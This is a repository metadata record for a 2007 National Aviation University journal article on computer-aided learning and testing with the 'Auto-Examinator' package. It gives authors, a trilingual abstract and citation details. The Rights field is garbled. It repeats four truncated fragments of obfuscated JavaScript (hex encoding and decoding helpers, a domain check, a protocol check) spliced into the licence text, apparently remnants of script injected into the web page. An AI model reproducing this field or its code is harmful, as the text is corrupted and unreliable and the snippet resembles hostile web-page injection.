Record Details

Computer-aided training and testing

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Computer-aided training and testing
Автоматизация обучения и проверки знаний
АВТОМАТИЗАЦІЯ НАВЧАННЯ І ПЕРЕВІРКИ ЗНАНЬ
 
Creator Русаловський, А.В.
Кот, Т.М.
Кошуков, О.В.
 
Subject


 
Description  A range of tasks related to increasing efficiency of learning process and testing by means of information technologies and automation of those processes come under review in this article. Efficiency of learning and testing using traditional methods vs. analogous methods utilizing personal computers is compared. It is stated that utilizing computer enables to eliminate certain shortcomings of traditional learning and testing methods. Basic technological steps of learning and testing associated with using “Auto-Examinator” computer-based learning, testing software package are reviewed. Conclusions on benefits of use of computer-based learning and testing software for both teachers and students are drawn.
 Рассмотрены способы повышения эффективности обучения и проверки знаний по автоматизации этих про-процессов с использованием информационных технологий. Сравнительно эффективность обучения и проверки знаний традиционным методом с аналогичными процессами во время использования компьютера. Определено, что его применение позволяет исключить некоторые недостатки традиционного метода обучения и проверки знаний. Сделаны выводы о преимуществах использования при обучении и проверке знаний компьютерных обучающих программ.
 Розглянуто способи підвищення ефективності навчання і перевірки знань через автоматизацію цих процесів із використанням інформаційних технологій. Порівняно ефективність навчання і перевірки знань традиційним методом з аналогічними процесами під час використання комп’ютера. Визначено, що його застосування дозволяє виключити деякі недоліки традиційного методу навчання і перевірки знань. Зроблено висновки про переваги використання при навчанні і перевірці знань комп’ютерних навчальних програм.
 
Publisher National Aviation University
 
Contributor


 
Date 2007-03-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1520
10.18372/2306-1472.33.1520
 
Source Proceedings of the National Aviation University; Том 33, № 3-4 (2007); 174-177
Вестник Национального авиационного университета; Том 33, № 3-4 (2007); 174-177
Вісник Національного Авіаційного Університету; Том 33, № 3-4 (2007); 174-177
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ